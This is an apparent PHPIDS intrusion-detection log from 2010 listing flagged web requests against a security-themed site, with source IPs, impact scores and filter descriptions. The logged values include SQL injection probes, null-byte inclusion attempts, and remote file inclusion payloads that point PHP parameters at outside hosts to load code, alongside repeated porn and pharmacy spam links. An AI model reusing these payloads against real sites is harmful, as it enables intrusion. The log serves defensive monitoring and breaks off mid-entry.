Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/nemesis-ip
IP:113.169.121.132
Impact:20
Created:2010-04-28 06:32:10
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122762
Name:GET.page
Value:backtrack-3 and 0=1 union select -man/nemesis-ip
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/nemesis-ip
IP:113.169.121.132
Impact:20
Created:2010-04-28 06:32:10
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122759
Name:REQUEST.codeme
Value:Is it so important?, <a href= http://technorati.com/people/hotlesbiansex#1 >hot lesbian sex</a> [url=http://technorati.com/people/hotlesbiansex#1]hot lesbian sex[/url], prwbld,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:36
Created:2010-04-28 05:46:00
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122760
Name:POST.codeme
Value:Is it so important?, <a href= http://technorati.com/people/hotlesbiansex#1 >hot lesbian sex</a> [url=http://technorati.com/people/hotlesbiansex#1]hot lesbian sex[/url], prwbld,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:36
Created:2010-04-28 05:46:00
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122757
Name:REQUEST.page
Value:backtrack-3 and 0=1 union select -man/ike-scan
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/ike-scan
IP:118.68.165.114
Impact:20
Created:2010-04-28 05:23:36
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122758
Name:GET.page
Value:backtrack-3 and 0=1 union select -man/ike-scan
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/ike-scan
IP:118.68.165.114
Impact:20
Created:2010-04-28 05:23:36
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122755
Name:REQUEST.page
Value:backtrack-3 and 0=1 union select -man/nemesis-ip
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/nemesis-ip
IP:118.68.165.114
Impact:20
Created:2010-04-28 05:23:35
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122756
Name:GET.page
Value:backtrack-3 and 0=1 union select -man/nemesis-ip
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/nemesis-ip
IP:118.68.165.114
Impact:20
Created:2010-04-28 05:23:35
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122753
Name:REQUEST.page
Value:"
Page:/i.php?page=%22
IP:67.195.111.36
Impact:12
Created:2010-04-28 05:06:37
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122754
Name:GET.page
Value:"
Page:/i.php?page=%22
IP:67.195.111.36
Impact:12
Created:2010-04-28 05:06:37
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122751
Name:REQUEST.codeme
Value:What?, <a href= http://technorati.com/people/narutoporn#1 >naruto porn free</a> [url=http://technorati.com/people/narutoporn#1]naruto porn free[/url], gphufg,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:36
Created:2010-04-28 04:56:01
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122752
Name:POST.codeme
Value:What?, <a href= http://technorati.com/people/narutoporn#1 >naruto porn free</a> [url=http://technorati.com/people/narutoporn#1]naruto porn free[/url], gphufg,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:36
Created:2010-04-28 04:56:01
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122749
Name:REQUEST.page
Value:''
Page:/i.php?page=''
IP:208.80.193.32
Impact:12
Created:2010-04-28 04:28:44
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122750
Name:GET.page
Value:''
Page:/i.php?page=''
IP:208.80.193.32
Impact:12
Created:2010-04-28 04:28:44
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122747
Name:REQUEST.codeme
Value:I have the same., <a href= http://technorati.com/people/sexoasis >sex oasis</a>, [url= http://technorati.com/people/sexoasis ]sex oasis[/url], swox,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-28 04:06:31
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122748
Name:POST.codeme
Value:I have the same., <a href= http://technorati.com/people/sexoasis >sex oasis</a>, [url= http://technorati.com/people/sexoasis ]sex oasis[/url], swox,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-28 04:06:31
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122745
Name:REQUEST.codeme
Value:Real, <a href= http://technorati.com/people/buyphenterminewithoutprescript#1 >buy phentermine without prescription online no hasle</a> [url=http://technorati.com/people/buyphenterminewithoutprescript#1]buy phentermine without prescription online no hasle[/url], 5267,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-28 03:17:03
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122746
Name:POST.codeme
Value:Real, <a href= http://technorati.com/people/buyphenterminewithoutprescript#1 >buy phentermine without prescription online no hasle</a> [url=http://technorati.com/people/buyphenterminewithoutprescript#1]buy phentermine without prescription online no hasle[/url], 5267,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-28 03:17:03
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122743
Name:REQUEST.page
Value:" and 1=0 -- security/localsamcrack2
Page:/i.php?page=%22+and+1=0+--+security/localsamcrack2
IP:193.226.6.229
Impact:44
Created:2010-04-28 02:34:57
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49

ID:122744
Name:GET.page
Value:" and 1=0 -- security/localsamcrack2
Page:/i.php?page=%22+and+1=0+--+security/localsamcrack2
IP:193.226.6.229
Impact:44
Created:2010-04-28 02:34:57
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49

ID:122741
Name:REQUEST.page
Value:'security/localsamcrack2
Page:/i.php?page=%00'security/localsamcrack2
IP:193.226.6.229
Impact:10
Created:2010-04-28 02:34:52
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122742
Name:GET.page
Value:'security/localsamcrack2
Page:/i.php?page=%00'security/localsamcrack2
IP:193.226.6.229
Impact:10
Created:2010-04-28 02:34:52
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122737
Name:REQUEST.page
Value:" and 1=0 -- security/localsamcrack2
Page:/i.php?page=%22+and+1=0+--+security/localsamcrack2
IP:193.226.6.229
Impact:44
Created:2010-04-28 02:34:50
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49

ID:122738
Name:GET.page
Value:" and 1=0 -- security/localsamcrack2
Page:/i.php?page=%22+and+1=0+--+security/localsamcrack2
IP:193.226.6.229
Impact:44
Created:2010-04-28 02:34:50
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49

ID:122739
Name:REQUEST.page
Value:suckmydick.phpsecurity/localsamcrack2
Page:/i.php?page=suckmydick.php%00security/localsamcrack2
IP:193.226.6.229
Impact:10
Created:2010-04-28 02:34:50
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122740
Name:GET.page
Value:suckmydick.phpsecurity/localsamcrack2
Page:/i.php?page=suckmydick.php%00security/localsamcrack2
IP:193.226.6.229
Impact:10
Created:2010-04-28 02:34:50
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122735
Name:REQUEST.page
Value:'security/localsamcrack2
Page:/i.php?page=%00'security/localsamcrack2
IP:193.226.6.229
Impact:10
Created:2010-04-28 02:34:44
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122736
Name:GET.page
Value:'security/localsamcrack2
Page:/i.php?page=%00'security/localsamcrack2
IP:193.226.6.229
Impact:10
Created:2010-04-28 02:34:44
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122733
Name:REQUEST.page
Value:suckmydick.phpsecurity/localsamcrack2
Page:/i.php?page=suckmydick.php%00security/localsamcrack2
IP:193.226.6.229
Impact:10
Created:2010-04-28 02:34:42
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122734
Name:GET.page
Value:suckmydick.phpsecurity/localsamcrack2
Page:/i.php?page=suckmydick.php%00security/localsamcrack2
IP:193.226.6.229
Impact:10
Created:2010-04-28 02:34:42
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122731
Name:REQUEST.codeme
Value:Beautiful site, <a href= http://technorati.com/people/antidepressantdrugyoucantakewi#1 >antidepressant drug you can take with phentermine</a> [url=http://technorati.com/people/antidepressantdrugyoucantakewi#1]antidepressant drug you can take with phentermine[/url], 653878,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-28 02:27:30
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122732
Name:POST.codeme
Value:Beautiful site, <a href= http://technorati.com/people/antidepressantdrugyoucantakewi#1 >antidepressant drug you can take with phentermine</a> [url=http://technorati.com/people/antidepressantdrugyoucantakewi#1]antidepressant drug you can take with phentermine[/url], 653878,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-28 02:27:30
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122729
Name:REQUEST.codeme
Value:Only, <a href= http://technorati.com/people/arethereanysideeffectswiththed >First are there any side effects with the drug viagra</a>, [url= http://technorati.com/people/arethereanysideeffectswiththed ]First are there any side effects with the drug viagra[/url], 9371,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-28 01:37:43
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122730
Name:POST.codeme
Value:Only, <a href= http://technorati.com/people/arethereanysideeffectswiththed >First are there any side effects with the drug viagra</a>, [url= http://technorati.com/people/arethereanysideeffectswiththed ]First are there any side effects with the drug viagra[/url], 9371,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-28 01:37:43
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122727
Name:REQUEST.page
Value:videos/pn12/i.php?page=books
Page:/i.php?page=videos/pn12/i.php?page=books
IP:75.101.192.210
Impact:10
Created:2010-04-28 00:52:25
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122728
Name:GET.page
Value:videos/pn12/i.php?page=books
Page:/i.php?page=videos/pn12/i.php?page=books
IP:75.101.192.210
Impact:10
Created:2010-04-28 00:52:25
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:122725
Name:REQUEST.codeme
Value:Very interesting sites., <a href= http://technorati.com/people/brutaldildo >Best brutal dildo</a>, [url= http://technorati.com/people/brutaldildo ]Best brutal dildo[/url], 70962,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-28 00:48:06
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122726
Name:POST.codeme
Value:Very interesting sites., <a href= http://technorati.com/people/brutaldildo >Best brutal dildo</a>, [url= http://technorati.com/people/brutaldildo ]Best brutal dildo[/url], 70962,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-28 00:48:06
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122723
Name:REQUEST.codeme
Value:Perfect work, <a href= http://technorati.com/people/grannysporn >grannys porn</a>, [url= http://technorati.com/people/grannysporn ]grannys porn[/url], ltyk,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-27 23:58:42
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122724
Name:POST.codeme
Value:Perfect work, <a href= http://technorati.com/people/grannysporn >grannys porn</a>, [url= http://technorati.com/people/grannysporn ]grannys porn[/url], ltyk,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-27 23:58:42
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122721
Name:REQUEST.page
Value:videos/building-a-hacklab
Page:/i.php?page=videos/building-a-hacklab%00
IP:67.195.111.36
Impact:10
Created:2010-04-27 23:58:37
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122722
Name:GET.page
Value:videos/building-a-hacklab
Page:/i.php?page=videos/building-a-hacklab%00
IP:67.195.111.36
Impact:10
Created:2010-04-27 23:58:37
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122719
Name:REQUEST.page
Value:security/thumbscrew-software-usb--write-blocker
Page:/i.php?page=security/thumbscrew-software-usb--write-blocker
IP:67.195.111.36
Impact:6
Created:2010-04-27 23:34:52
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122720
Name:GET.page
Value:security/thumbscrew-software-usb--write-blocker
Page:/i.php?page=security/thumbscrew-software-usb--write-blocker
IP:67.195.111.36
Impact:6
Created:2010-04-27 23:34:52
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122717
Name:REQUEST.page
Value:backtrack-3 and 0=1 union select -man/ike-scan
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/ike-scan
IP:58.187.16.251
Impact:20
Created:2010-04-27 23:04:35
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122718
Name:GET.page
Value:backtrack-3 and 0=1 union select -man/ike-scan
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/ike-scan
IP:58.187.16.251
Impact:20
Created:2010-04-27 23:04:35
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122713
Name:REQUEST.page
Value:reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://www.waterdistrict2.com/poll/.log??
Page:/i.php?page=reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://www.waterdistrict2.com/poll/.log??
IP:72.52.150.147
Impact:30
Created:2010-04-27 22:28:34
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122714
Name:REQUEST.page
Value:reviews//include/scripts/export_batch.inc.php?DIR=http://www.waterdistrict2.com/poll/.log??
Page:/i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://www.waterdistrict2.com/poll/.log??
IP:72.52.150.147
Impact:30
Created:2010-04-27 22:28:34
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122715
Name:GET.page
Value:reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://www.waterdistrict2.com/poll/.log??
Page:/i.php?page=reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://www.waterdistrict2.com/poll/.log??
IP:72.52.150.147
Impact:30
Created:2010-04-27 22:28:34
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122716
Name:GET.page
Value:reviews//include/scripts/export_batch.inc.php?DIR=http://www.waterdistrict2.com/poll/.log??
Page:/i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://www.waterdistrict2.com/poll/.log??
IP:72.52.150.147
Impact:30
Created:2010-04-27 22:28:34
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122711
Name:REQUEST.codeme
Value:can you do thi for me, <a href= http://technorati.com/people/gaysexstories#1 >Cheapest gay sex stories</a> [url=http://technorati.com/people/gaysexstories#1]Cheapest gay sex stories[/url], 268236,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-27 22:19:46
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122712
Name:POST.codeme
Value:can you do thi for me, <a href= http://technorati.com/people/gaysexstories#1 >Cheapest gay sex stories</a> [url=http://technorati.com/people/gaysexstories#1]Cheapest gay sex stories[/url], 268236,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-27 22:19:46
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122709
Name:REQUEST.page
Value:security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker
Page:/i.php?page=security/thumbscrew-software-%3Cspan%20style=%27background-color:yellow%27%3Eusb%3C/span%3E-write-blocker
IP:67.195.111.36
Impact:42
Created:2010-04-27 22:18:08
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122710
Name:GET.page
Value:security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker
Page:/i.php?page=security/thumbscrew-software-%3Cspan%20style=%27background-color:yellow%27%3Eusb%3C/span%3E-write-blocker
IP:67.195.111.36
Impact:42
Created:2010-04-27 22:18:08
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122707
Name:REQUEST.codeme
Value:I have the same., <a href= http://technorati.com/people/bigblacktits#1 >All about big black tits</a> [url=http://technorati.com/people/bigblacktits#1]All about big black tits[/url], sdj,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-27 21:30:04
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122708
Name:POST.codeme
Value:I have the same., <a href= http://technorati.com/people/bigblacktits#1 >All about big black tits</a> [url=http://technorati.com/people/bigblacktits#1]All about big black tits[/url], sdj,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-27 21:30:04
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122705
Name:REQUEST.page
Value:security/bluecasing1 ////////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/bluecasing1%20%20////////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head??
IP:74.50.85.15
Impact:40
Created:2010-04-27 20:56:36
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++:::

ID:122706
Name:GET.page
Value:security/bluecasing1 ////////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/bluecasing1%20%20////////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head??
IP:74.50.85.15
Impact:40
Created:2010-04-27 20:56:36
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++:::

ID:122703
Name:REQUEST.page
Value:security/bluecasing1 ////////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/bluecasing1%20%20////////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head??
IP:74.50.85.15
Impact:40
Created:2010-04-27 20:56:33
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++:::

ID:122704
Name:GET.page
Value:security/bluecasing1 ////////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/bluecasing1%20%20////////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head??
IP:74.50.85.15
Impact:40
Created:2010-04-27 20:56:33
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++:::

ID:122697
Name:REQUEST.page
Value:security/networkprinterhacking ////////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/networkprinterhacking%20%20////////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head??
IP:74.50.85.15
Impact:40
Created:2010-04-27 20:53:46
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++:::

ID:122698
Name:GET.page
Value:security/networkprinterhacking ////////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/networkprinterhacking%20%20////////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head??
IP:74.50.85.15
Impact:40
Created:2010-04-27 20:53:46
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++:::

ID:122699
Name:REQUEST.page
Value:security/networkprinterhacking ////////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/networkprinterhacking%20%20////////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head??
IP:74.50.85.15
Impact:40
Created:2010-04-27 20:53:46
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++:::

ID:122700
Name:GET.page
Value:security/networkprinterhacking ////////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head??
